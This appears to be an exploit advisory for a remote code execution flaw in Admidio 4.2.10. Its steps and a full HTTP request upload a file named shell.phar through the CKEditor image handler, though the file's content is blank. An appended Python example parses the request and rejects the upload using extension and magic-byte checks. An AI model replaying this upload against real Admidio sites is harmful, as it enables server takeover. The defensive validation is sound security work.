
Admidio v4.2.10 - Remote Code Execution (RCE)

Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)
Application: Admidio
Version: 4.2.10
Bugs: RCE
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date of found: 10.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
====================================================
Steps:
1. Login to account
2. Go to Announcements
3. Add entry
4. Upload a .phar file in the image upload section.
.phar file content:

5. Request:
POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: localhost
Content-Length: 378
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNenene9Truc1TaqHr86r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: admidio_admidio_adm_cookieconsent_status=imply; admidio_admidio_adm_session_id=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=O3Th5rcGHWXX2QAR157XX4Y1F7FQ42AYQ9TAV8MB
Connection: close

------WebKitFormBoundaryNenene9Truc1TaqHr86r
Content-Disposition: form-data; name="upload"; filename="shell.phar"
Content-Type: application/octet-stream

------WebKitFormBoundaryNenene9Truc1TaqHr86r
Content-Disposition: form-data; name="ckCsrfToken"

O3Th5rcGHWXX2QAR157XX4Y1F7FQ42AYQ9TAV8MB
------WebKitFormBoundaryNenene9Truc1TaqHr86r--
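As an added defensive example (not part of the original advisory and not Admidio's code), the following Python parses a multipart/form-data body shaped like the request above and applies the check an image-upload handler should make: an extension allow-list plus magic-byte verification, so a file named shell.phar (or any non-image bytes) is rejected whatever Content-Type the client declares. The boundary is the one from the request; the file bytes and the token value are constructed placeholders.

```python
import re
# Image types an image-upload endpoint should accept; shell.phar is rejected before it touches disk.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
MAGIC = [(b"\x89PNG\r\n\x1a\n", "png"), (b"\xff\xd8\xff", "jpg"),
         (b"GIF87a", "gif"), (b"GIF89a", "gif")]

def parse_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body into dicts: filename, content_type, data."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):                 # closing delimiter reached
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        fname = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        parts.append({"filename": fname.group(1) if fname else None,
                      "content_type": headers.get("content-type"),
                      "data": data[:-2] if data.endswith(b"\r\n") else data})
    return parts

def check_upload(filename: str, data: bytes) -> tuple:
    """Accept only if the extension is allow-listed AND the bytes really are that image type.
    The client-declared Content-Type is ignored on purpose: it is attacker-controlled."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]   # strip any path component
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXT:
        return False, f"extension '{ext}' not allowed"
    ext = "jpg" if ext == "jpeg" else ext
    kind = next((k for magic, k in MAGIC if data.startswith(magic)), None)
    if kind != ext:
        return False, f"content ({kind}) does not match extension '{ext}'"
    return True, "ok"

def audit(body: bytes, boundary: str) -> list:
    """(filename, accepted, reason) for every file part in a request body."""
    return [(p["filename"], *check_upload(p["filename"], p["data"]))
            for p in parse_multipart(body, boundary) if p["filename"]]

# Constructed body shaped like the advisory's request; file bytes and token are placeholders.
BOUNDARY = "----WebKitFormBoundaryNenene9Truc1TaqHr86r"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload"; filename="shell.phar"\r\n'
    "Content-Type: application/octet-stream\r\n\r\nnot-an-image\r\n"
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="ckCsrfToken"\r\n\r\n'
    f"TOKEN-PLACEHOLDER\r\n--{BOUNDARY}--\r\n"
).encode()
```

Running audit(SAMPLE_BODY, BOUNDARY) rejects shell.phar on the extension check alone; a correctly named file whose bytes are not that image type is rejected by the magic-byte comparison.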
 